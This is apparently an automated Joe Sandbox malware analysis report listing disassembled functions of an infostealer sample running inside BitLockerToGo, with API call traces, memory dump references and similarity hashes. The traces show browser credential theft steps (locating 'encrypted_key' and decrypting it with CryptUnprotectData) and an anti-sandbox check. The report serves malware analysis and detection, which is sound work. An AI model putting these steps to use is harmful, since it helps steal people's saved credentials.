                                                                                                                                                                                                                                                                                                                    Function 008F278C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F27A0
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F27A7
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,009178C8,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F27D5
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(009178C8,00000000,00000000,00000000,000000FF,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F27F1
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(009178C8,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F27FA
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                    • String ID: Windows 11
                                                                                                                                                                                                                                                                                                                    • API String ID: 3225020163-2517555085
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a4e66dce203f7d7ca8cdab6990024a43bafe63e856d5adeb50ee01c4b2973480
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e89774f0760fb788936471a297d48eb25ef1191196c7079927878102897fbfc4
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4e66dce203f7d7ca8cdab6990024a43bafe63e856d5adeb50ee01c4b2973480
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21F04F75640308FFEB209BA4DC0AFBA7A79FB44B41F100024BB01E61A4DBB09952D751
                                                                                                                                                                                                                                                                                                                    Function 008F2805 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,008F2877,008F27B4,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F2819
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F2820
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,009178C8,?,?,?,008F2877,008F27B4,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F283E
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(009178C8,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,008F2877,008F27B4,?,?,?,008F5BD2,Windows: ), ref: 008F2859
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(009178C8,?,?,?,008F2877,008F27B4,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F2862
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                    • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                                                                                    • API String ID: 3225020163-1022791448
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8c6c51b0eabec638521da1df91450cec36c9e6225f4bbd9df1b645637d62a99d
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 904333b144c1d778718fefbc022c12a24d75895dc06b5d6b56e30e87bd02a310
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c6c51b0eabec638521da1df91450cec36c9e6225f4bbd9df1b645637d62a99d
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1F01D75680208BBEB205BA0DC0AFAA7A79EB44B45F100024F701E6091DFB05A52D654
                                                                                                                                                                                                                                                                                                                    Function 008F73AA Relevance: 9.1, APIs: 6, Instructions: 107registrystringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F73DF
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 008F73FF
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 008F7425
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 008F7431
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F7460
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?), ref: 008F7473
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3891774339-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9c776dc1329dd29dc4a35e167f2eda42e82c31ffe84c07fa3cca33779aed3307
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b1ac8f23c136caec07cd34b09e1d6a95fe8810e7a1c5b81d7f06eb78a64b8200
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c776dc1329dd29dc4a35e167f2eda42e82c31ffe84c07fa3cca33779aed3307
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2416D7188001DAFDF25EB68DC4AEE97779FB18304F5004A5A608E31A1DE705EDACF91
                                                                                                                                                                                                                                                                                                                    Function 008E93A4 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 105stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,008F8680,?), ref: 008F3A93
                                                                                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?), ref: 008E93EE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E91FF: LocalAlloc.KERNEL32(00000040,?,00000001,?,?,?,?,008E665F,00000000,?), ref: 008E9239
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E92A6: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,008E9456), ref: 008E92C9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E92A6: LocalAlloc.KERNEL32(00000040,008E9456,?,?,008E9456,?,008EDC56,?,?,?,?,?,?), ref: 008E92DD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E92A6: LocalFree.KERNEL32(?,?,?,008E9456,?,008EDC56,?,?,?,?,?,?), ref: 008E9302
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000001,?,?,?,?,?,?), ref: 008E947F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Local$Alloc$File$Createlstrcpylstrlen$CloseCryptDataFreeHandleObjectReadSingleSizeThreadUnprotectWaitlstrcat
                                                                                                                                                                                                                                                                                                                    • String ID: $"encrypted_key":"$DPAPI$_key.txt
                                                                                                                                                                                                                                                                                                                    • API String ID: 2040183763-3468172165
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a1bf3f98b856df621971467e7b4bf52c2518e1ee58fdbe2fd49949714ea1872b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 50341513e3caa655a78114b41e3961a29c037ab3f480f5be01f60110fc45b828
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1bf3f98b856df621971467e7b4bf52c2518e1ee58fdbe2fd49949714ea1872b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C316D36A0014DBBDF10EBAADC829DD7774FF06364F204164F944E6291DBB09E46CAA5
                                                                                                                                                                                                                                                                                                                    Function 008E9148 Relevance: 9.1, APIs: 6, Instructions: 60filememoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(008EFCF9,?,?,?,?,008EF752,?,?,?), ref: 008E91C7
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2311089104-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: e6d4d2ad323e0c55519256a8ab66e0c5b022fca9537ccd83974731a60bb81604
                                                                                                                                                                                                                                                                                                                    • Instruction ID: dc04381f7880e4a44a63f35d3ce6284ea6d368da8c4a86ed798da16e8cd7a719
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6d4d2ad323e0c55519256a8ab66e0c5b022fca9537ccd83974731a60bb81604
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A114974900245FBDB259FA6CC48EAEBBB9FB85740F200548F981E3150D7B49A41DB11
                                                                                                                                                                                                                                                                                                                    Function 008E10E0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 008E109A
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E10C0
                                                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 008E10D6
                                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,008F9CAB), ref: 008E10F0
                                                                                                                                                                                                                                                                                                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 008E10F7
                                                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 008E1102
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1859398019-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 174cb06f2eecbb5e520f207fcb0198c9b2b6e52e9d5df00719987b239dc245f7
                                                                                                                                                                                                                                                                                                                    • Instruction ID: aefd3ef68151f69a0ef1df02275a7fbd498f0572bd7cc2f2173e7f0eb1c82c50
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 174cb06f2eecbb5e520f207fcb0198c9b2b6e52e9d5df00719987b239dc245f7
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CF0FC75B8579077E62012762C5EFFB2A5CEB46F56F204014F308EB1D0D6619984E674
                                                                                                                                                                                                                                                                                                                    Function 008F7B46 Relevance: 8.9, APIs: 7, Instructions: 120stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F7BD5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 008F3A59
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008F7BF2
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F7C11
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F7C25
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?), ref: 008F7C38
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F7C4C
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?), ref: 008F7C5F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F39EE: GetFileAttributesA.KERNEL32(?,?,?,008EEA72,?,?,?), ref: 008F39F5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 008F787F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: RtlAllocateHeap.NTDLL(00000000), ref: 008F7886
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: wsprintfA.USER32 ref: 008F789F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: FindFirstFileA.KERNEL32(?,?), ref: 008F78B6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: StrCmpCA.SHLWAPI(?,00917AD8), ref: 008F78D7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: StrCmpCA.SHLWAPI(?,00917ADC), ref: 008F78F1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: wsprintfA.USER32 ref: 008F7918
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: CopyFileA.KERNEL32(?,?,00000001), ref: 008F79D5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F785A: DeleteFileA.KERNEL32(?), ref: 008F79F8
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
